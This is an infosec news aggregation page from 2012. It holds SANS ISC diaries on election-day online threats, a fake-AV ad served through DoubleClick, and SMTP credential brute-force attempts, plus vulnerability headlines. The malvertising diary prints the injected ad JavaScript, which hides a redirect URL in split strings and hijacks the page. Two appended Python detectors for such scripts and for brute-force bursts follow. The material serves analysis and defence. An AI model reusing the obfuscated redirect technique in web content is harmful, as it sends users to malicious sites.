Hackin9

InfoSec News


Today (Tuesday) is election day in the US. Many voters have already cast their ballot via absentee and early voting, but the vast majority will vote today. Like any major event, this is likely going to be used and abused in some way online. Here are some of the network security related issues to watch out for:

Search Engine Poisoning

This is an issue we have certainly seen less of this year. Search engines appear to have a better handle on poisoning of common search terms by black hat SEO operations. But that doesn't mean it isn't happening, and this is an event with a long lead time, so it is possible that we see something new and different.

Social Media Links

Facebook has been pretty crowded lately with statements supporting various candidates. So far, I haven't seen this used maliciously, but it is an obvious easy target to introduce a link to a malicious version of a popular video clip. Of course fake late breaking news could be used to sway some last minute decisions, but it is likely too late for that.

DDoS Attacks

This year, we have seen plenty of politically motivated DDoS attacks. It would be no surprise to see more of that tomorrow. On the other hand, large news sites will see record viewer numbers, and likely very dynamic, frequently updated content. This will make them even more vulnerable to a DDoS attack, or it may be hard to figure out if a site is down or slow due to a DDoS attack or just normal load. Don't spread/re-tweet rumors. Also, the late breaking scandal may use Twitter. See the social media comment above.



Polling Place Locations

Refer to official guides and official websites to find out where to vote. Polling places can change from election to election, and you may be standing in line only to be told that you are in the wrong location. So far, this has not been abused, but misinformation has been spread via outdated unofficial sites.

Summary

Only use official information from the original official source. If at all possible, use printed material like sample ballots that you received in the mail (not that they are always right), and refer to URLs that you have bookmarked in the past. There have been some news reports that areas affected by hurricane Sandy will allow for special voting arrangements like e-mail. Please confirm with an official source before e-mailing or faxing your vote. I will try and collect some of these sources here later.

Anything I forgot? (Of course: go and vote if you are eligible to do so.)

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Cellular coverage for some carriers approached normal levels in the northeastern U.S. a week after Hurricane Sandy made landfall, but some areas remained cut off from mobile service because of ongoing power and telecommunications outages.
 
The Asia Pacific market has become a pressure cooker. A jolt in the regional economy is straining current IT infrastructures. Increasing workloads and incessant demands any time and from anywhere are seeing many traditional infrastructure creaking under pressure.
 
 

Reader James ran into a Fake AV ad delivered by DoubleClick. It is not clear if this is the result of a compromise of DoubleClick, or a paid ad that slipped through DoubleClick's content review process. James started out at a local newspaper web site that, like many others, features ads served by DoubleClick. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized, and spaces inserted into domain names to avoid accidental clicks):

GET [...]
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Connection: Keep-Alive
Cookie: id=xxxxa||t=1352150000|et=730|cs=yyyy

The reply to this request was:

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 167
Date: Mon, 05 Nov 2012 22:32:59 GMT

document.write("<script type=\"text/javascript\" language=\"javascript\" src=\"http://inc cam paign.com/jsb.php?id=29585w=bt=ju=13\"><\/script>");document.write(



This is typical DoubleClick. The ad returns a reference to some JavaScript. At this point, this isn't quite suspicious yet. But let's see what we get back from inccampaign.com:

If we access the site with wget (but fake the user agent), we get back:

http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image, advertising luxury watches (these days of course, a luxury watch ad suggests a link to spamming).



James, on the other hand, got the following content back (I wasn't able to reproduce this):



document.write("<a href=\"http://pw brand.com\" target=\"_blank\"><img src=\"http://inccampaign.com/pr/b/29585.jpg\" style=\"border:none\" /></a>");

var url = "http:"+"//fav"+"ozek."+"info/"+"in.ph"+"p?q=8"+"/CEg1"+"rjwdE"+"mPDwt"+"BLw6u"+"Sk36+"+"lyOya"+"TxYF9"+"UkLXx"+"A==";

if (window != top) { top.location.replace(url) } else { window.location.replace(url) }



The content starts out very similar, but his copy included additional JavaScript that forwards the user to fav ozek.info. The domain is somewhat new (October 12, 2012) and registered with Privacyprotect.org. Right now, none of the domains is listed as malicious in VirusTotal.



Still digging deeper into this, but right now, this looks at least suspicious. Let me know if you see similar issues with DoubleClick ads.
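A small check, added here as an example (not the diary's tooling and nothing from DoubleClick or the ad network), that takes the JavaScript an ad call returns, joins split string literals of the kind seen in James' copy back together, and flags a top-level redirect or a hidden URL pointing at a host outside an assumed allow-list. The sample scripts, host names and allow-list are constructed stand-ins for the ones above.

```python
import re
from urllib.parse import urlparse

# Constructed stand-ins modelled on the two responses in the diary
# (documentation-style host names, not the real ones).
BENIGN_JS = r'''document.write("<a href=\"http://brand.example\" target=\"_blank\"><img src=\"http://adnet.example/pr/b/29585.jpg\" style=\"border:none\" /></a>");'''
SUSPECT_JS = BENIGN_JS + r'''
var url = "http:"+"//red"+"irect"+".exam"+"ple/i"+"n.php"+"?q=8A"+"==";
if (window != top) { top.location.replace(url) } else { window.location.replace(url) }'''

# Hosts the creative is allowed to reference (an assumed allow-list for this example).
EXPECTED_HOSTS = {"brand.example", "adnet.example"}

STRING = r'"((?:[^"\\]|\\.)*)"'                               # one double-quoted JS literal
CHAIN = re.compile(STRING + r'(?:\s*\+\s*' + STRING + r')+')  # "a"+"b"+... chains
REDIRECT = re.compile(r'\b(?:top|window|self|parent)\.location'
                      r'(?:\.replace|\.assign|\.href)?\s*[(=]')
URL = re.compile(r'https?://[^"\'\s<>\\]+')

def unsplit_strings(js):
    """Join "http:"+"//fav"+... chains into one literal so the URL becomes readable."""
    def join(m):
        return '"' + ''.join(re.findall(STRING, m.group(0))) + '"'
    return CHAIN.sub(join, js)

def analyze_ad_script(js, expected_hosts=EXPECTED_HOSTS):
    """Flag ad JavaScript that hides a URL in split strings and/or redirects the page."""
    plain = unsplit_strings(js)
    hosts = {urlparse(u).hostname for u in URL.findall(plain)}
    unexpected = sorted(h for h in hosts if h not in expected_hosts)
    redirect = REDIRECT.search(plain) is not None
    split = CHAIN.search(js) is not None
    return {
        "hosts": sorted(hosts),
        "unexpected_hosts": unexpected,
        "redirect": redirect,
        "split_strings": split,
        # A creative should only write markup: any top-level redirect is suspicious,
        # and so is a reassembled string pointing at a host the network does not own.
        "suspicious": redirect or (split and bool(unexpected)),
    }

if __name__ == "__main__":
    for name, js in (("benign", BENIGN_JS), ("suspect", SUSPECT_JS)):
        print(name, analyze_ad_script(js))
```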



------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

 
Multiple Symantec Products CAB Files Handling Memory Corruption Vulnerability
 
YUI 'SWF' File Unspecified Security Vulnerability
 
For the past three years, Nils Puhlmann was head of security for Zynga, the social games company that created mega-hits Farmville and Words With Friends.
 
AT&T will sell two Samsung tablets starting Friday: the Galaxy Tab 2 10.1 for $499.99 and the ATIV Smart PC for $799.99.
 
The co-chairman of the Ohio Green Party and editor of FreePress.org, Bob Fitrakis, on Monday filed a federal lawsuit over software that was allegedly installed on central vote tabulation machines in 39 Ohio counties without being tested or certified for use as required by state law.
 
Reader Walt Bischoff and his spouse--like all good couples--would like to share more of their lives with one another. He writes:
 
 

Our reader (and podcast listener) Pete wrote in with a little SMTP log snippet:

2012-11-04 22:37:36 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:36 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:37 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:37 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:38 courier_login authenticator failed for 153.red-2-139-216.staticip.rima-tde.net ([192.168.2.33]) [2.139.216.153]:4232: 535 Incorrect authentication data (set_id=anna)

In this case, the attacker is 2.139.216.153. According to our DShield data, the host has a history of port 25 scanning, and evidently, participates in these brute force attacks once it finds port 25 open. (see https://isc.sans.edu/ipdetails.html?ip=2.139.216.153 ).

But this is just one of many IPs that Pete sees coming into his network. They all use 192.168.2.33 as hostname, which appears to be hard-coded into the bot used to produce these scans.

Typically, these scans try to brute force SMTP credentials (not POP/IMAP credentials) to send spam via your users' e-mail accounts. A few tips to help mitigate these attacks:


Enable rate limits for inbound authentication attempts. This will at least slow down the attack. (Consult your mail server's manual for details; each server is different.)

Enable reasonable rate limits for outbound e-mail. This way, it is easier to detect compromised accounts, and the account is of less value to the spammer.

Do not rely on passwords. Use SSL client certificates (or at least enforce a strong password policy).

Only allow connections to send mail from inside your network, or via a VPN.


Any other ideas? FWIW: I do not recommend strict lockout policies for mail servers. They can make it impossible to change your SMTP password. Many users use multiple devices these days, and if, for example, you lock an account after 3 bad logins, a user changing a password will be locked out, as the user's cell phone / tablet will continue to use the old password until it is changed. If you do implement lockout, then please communicate this to your users and ask them to first turn off all devices (that can be challenging, as they may not even remember which devices they have) and then change their password.
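A detection pass over log lines in the format of Pete's snippet, added here as an example (not Pete's logs or any ISC tooling): it groups authentication failures by source IP, flags a source that produces a burst of failures inside a time window, and separately flags any client presenting the hard-coded 192.168.2.33 name the diary describes. The log lines, IP addresses, window and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in the format Pete's snippet uses (documentation-range IPs,
# not the addresses from the diary). The bracketed name after the reverse DNS is
# the hostname the client presented, which the diary notes the bot hard-codes.
LOG = """\
2012-11-04 22:37:36 courier_login authenticator failed for host.example ([192.168.2.33]) [203.0.113.5]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:36 courier_login authenticator failed for host.example ([192.168.2.33]) [203.0.113.5]:4232: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:37 courier_login authenticator failed for host.example ([192.168.2.33]) [203.0.113.5]:4233: 535 Incorrect authentication data (set_id=bob)
2012-11-04 22:37:37 courier_login authenticator failed for host.example ([192.168.2.33]) [203.0.113.5]:4234: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:37:38 courier_login authenticator failed for host.example ([192.168.2.33]) [203.0.113.5]:4235: 535 Incorrect authentication data (set_id=anna)
2012-11-04 22:40:01 courier_login authenticator failed for laptop.example ([laptop]) [198.51.100.7]:51000: 535 Incorrect authentication data (set_id=carol)
"""

LINE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+ authenticator failed for '
    r'(?P<rdns>\S+) \(\[(?P<helo>[^\]]+)\]\) \[(?P<ip>[^\]]+)\]:\d+: '
    r'535 .*\(set_id=(?P<user>[^)]*)\)$')

def parse_failures(log_text):
    """Yield one dict per authentication failure line; other lines are skipped."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
            yield ev

def brute_force_sources(log_text, threshold=5, window=timedelta(seconds=60),
                        bot_helo="192.168.2.33"):
    """Return {ip: summary} for sources with >= threshold failures inside any
    `window`, or that present the hard-coded name the diary attributes to the bot."""
    by_ip = defaultdict(list)
    for ev in parse_failures(log_text):
        by_ip[ev["ip"]].append(ev)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        burst = False
        for i, first in enumerate(evs):          # sliding window over sorted times
            j = i
            while j < len(evs) and evs[j]["ts"] - first["ts"] <= window:
                j += 1
            if j - i >= threshold:
                burst = True
                break
        bot = any(e["helo"] == bot_helo for e in evs)
        if burst or bot:
            flagged[ip] = {"failures": len(evs), "burst": burst, "bot_helo": bot,
                           "users": sorted({e["user"] for e in evs})}
    return flagged

if __name__ == "__main__":
    for ip, info in brute_force_sources(LOG).items():
        print(ip, info)
```

The flagged summary is what a rate limit or alert would key on; the per-user list shows whether one account or many are being tried.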

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

 
A highly anticipated patent infringement case between Apple and Motorola Mobility was dismissed by a federal court Monday, hours before the trial was due to begin.
 
Some firms struggled while others smoothly executed disaster procedures. Experts said cloud computing aided data center resiliency.

 
The new iPad Mini costs Apple just under $200 in materials and manufacturing, an analyst said today, putting an exclamation point on the company's devotion to high profit margins.
 
A highly anticipated patent infringement case between Apple and Motorola Mobility was dismissed by a Wisconsin district court Monday, hours before the trial was due to begin.
 
Microsoft CEO Steve Ballmer said Windows Phone will grow quickly in the global smartphone market.
 
Munin CVE-2012-3512 Insecure File Permissions Vulnerability
 
Munin Insecure Temporary File Creation Vulnerability
 
Mesa 'visit_field()' Method CVE-2012-2864 Remote Code Execution Vulnerability
 
Looking beyond PCs and tablets, Lenovo on Monday announced the first server from the newly formed Enterprise Product Group, which deals in servers, storage, networking and software.
 

Posted by InfoSec News on Nov 05

http://www.bloomberg.com/news/2012-11-04/coke-hacked-and-doesn-t-tell.html

By Ben Elgin, Dune Lawrence and Michael Riley
Bloomberg.com
Nov 4, 2012

FBI officials quietly approached executives at Coca-Cola Co. (KO) on
March 15, 2009, with some startling news.

Hackers had broken into the company’s computer systems and were
pilfering sensitive files about its attempted $2.4 billion acquisition
of China Huiyuan Juice Group (1886), according to...
 

Posted by InfoSec News on Nov 05

http://arstechnica.com/tech-policy/2012/11/how-georgia-doxed-a-russian-hacker-and-why-it-matters/

By Nate Anderson
Ars Technica
Nov 2, 2012

On October 24, the country of Georgia took an unusual step: it posted to
the Web a 27-page writeup (PDF), in English, on how it has been under
assault from a hacker allegedly based in Russia. The paper included
details of the malware used, how it spread, and how it was controlled.
Even more unusually,...
 

Posted by InfoSec News on Nov 05

http://www.startribune.com/local/blogs/176986441.html

By Eric Roper
StarTribune.com
November 2, 2012

A former cop who sued a number of Minnesota cities for breaches of her
drivers license data has now garnered more than $1 million in
settlements, following Minneapolis' approval of a $392,500 payout
Friday.

The City Council approved the settlement related to Anne Rasmusson's
lawsuit following their meeting Friday morning. It comes...
 

Posted by InfoSec News on Nov 05

Forwarded from: Conference <conference (at) sba-research.org>

Dear all,

I would like to invite you to submit a paper to the Information
Communication Technology-Eurasia Conference (ICT-EurAsia 2013) which
will take place in Yogyakarta (Indonesia) 25th-29th March 2013.

http://www.ifs.tuwien.ac.at/ict-eurasia/

The conference is supported by ASEA-Uninet (ASEAN-European University
Network), EPU (Eurasian Pacific University...
 
Samsung's Galaxy S III smartphone hit the 30 million sales mark in the five months since it became available, according to a Samsung blog post today.
 
Microsoft is updating its C++ compiler for its Visual Studio 12 IDE so that Windows application developers can use parts of the latest version of the programming language, C++11.
 
Brocade has announced its acquisition of Vyatta, a privately held maker of open source-based network software, for an undisclosed amount of cash.
 

Posted by InfoSec News on Nov 05

http://www.federalnewsradio.com/534/3103270/Delayed-software-updates-leave-IRS-computers-prone-to-hackers

By Jack Moore
FederalNewsRadio.com
11/1/2012

Thousands of IRS computers could be prone to cyber intruders because
officials aren't updating software in a timely manner, according to a
report from the Treasury Inspector General for Tax Administration.

Because hackers often exploit glitches in existing software to gain
access to...
 
Public dumps of ImageShack and Symantec sites, ESX kernel source code published, a number of sites defacements and DDoS attacks: they all appear to be taking place on the day Anonymous hacktivists called for action


 
Cyber criminals are currently sending malicious email messages en masse that claim to be from Vodafone and contain an MMS picture message from one of its users


 
Oracle MySQL Server CVE-2012-3163 Remote MySQL Security Vulnerability
 
Oracle MySQL Server CVE-2012-3173 Remote MySQL Security Vulnerability
 
[CVE-2012-5777]EmpireCMS Template Parser Remote PHP Code Execution Vulnerability
 
Researchers at the University of South Carolina have discovered that some types of electricity meter are broadcasting unencrypted information that, with the right software, would enable eavesdroppers to determine whether you're at home.
 
Workday on Monday unveiled a new set of enhancements to its cloud-based ERP software aimed at winning business from large multinational companies.
 
Intel's new enterprise-class SSD raises the bar over its predecessor in almost every metric, from adding 15 times the write performance and twice the read performance to doubling the endurance.
 
The European Commission passed a new rule that will force European Union member states to open up the 2 GHz band for 4G technologies.
 
Different hacker groups claim to have breached servers belonging to ImageShack, Symantec, PayPal and other organizations.
 
Apple today said it sold 3 million iPad tablets during the opening three-day weekend of sales of the Mini, the same number it boasted it had dealt out in March for the then-new full-sized iPad.
 
Colt's new data-center architecture is designed to allow operators more flexibility in managing power and cooling, without having to do extensive remodelling, the company said Monday.
 
When we tested mobile device management (MDM) last year, the products were largely focused on asset management - provisioning, protecting and containing mobile devices. Insider (registration required)
 
 
VideoLAN VLC Media Player <= 2.0.4 Crash Bug
 
XSS in answer my question plugin
 
Vulnerable MSVC++ 2008 runtime libraries distributed with and installed by eM client
 
Drupal Custom Publishing Options HTML Injection Vulnerability
 
Drupal Announcements Module Access Bypass Vulnerability
 
[SECURITY] [DSA 2572-1] iceape security update
 
[SECURITY] [DSA 2571-1] libproxy security update
 
We had the opportunity to go hands-on with the Nokia Lumia 920 before the device was officially unveiled in Australia last week
 
Premier 100 IT Leader Chris Miller also answers questions on long-term unemployment and coping with a woefully understaffed IT department.
 
 
ManageEngine Support Center Plus Multiple Security Vulnerabilities
 
[ MDVSA-2012:170 ] firefox
 
When an infection can result from just calling up a mainstream website, malware becomes harder to battle.
 
NetApp today announced significant upgrades to two of its midrange Fabric Attached Storage arrays, boosting memory, processor cores and drive slots.
 
Products from Avira are not compatible with Windows 8 – upgrading from Windows 7 to version 8 with Avira installed will result in an error screen. The only way to solve the problem is to manually uninstall the software


 
Drupal Monthly Archive by Node Type Module Access Bypass Vulnerability
 
Drupal Gallery Formatter Module Unspecified HTML Injection Vulnerability
 
Ubercart SecureTrading Payment Method Drupal Module Security Bypass Vulnerability
 
Hewlett-Packard has agreed to transfer 3,000 of its employees to the General Motors payroll, as the automaker moves IT operations in-house
 
Having finally launched its next-generation operating system, Windows 8, Microsoft now faces what may be its most daunting marketing challenge ever.
 
The economic picture that Gartner's head of research painted at his firm's recent Symposium/ITxpo conference was upbeat in a surprising way.
 
We in IT have a decision to make: Do we want to be powerful, or do we want to be influential?
 
It might help to do the unexpected at your next job interview.
 
One in four Macs now run OS X Mountain Lion, Apple's newest operating system, data released last week showed.
 
Tools vendors like greater capabilities SDK brings to smartphone apps, even if new PCs are needed to test code
 
From Tor to steganography, these six techniques will help obscure the data and traces you leave online
 
Apple's new iPad Mini delivers a full-fledged iPad experience in a smaller package, making it an ideal option for those who have been wanting a more diminutive Apple tablet, says Michael deAgonia.
 
The data center infrastructure at DreamWorks Imagination Studios is certainly state of the art, but it doesn't make as much use of cloud, virtualization solid-state storage technologies as one might expect. Insider (registration required)
 
 
The law enforcement agency is currently looking to recruit two people to work on trojans that intercept VoIP calls at the source. The job is based at its head office in Cologne


 
libproxy CVE-2012-4505 Heap-Based Buffer Overflow Vulnerability
 
BigAnt IM Server 'USV' Request Buffer Overflow Vulnerability
 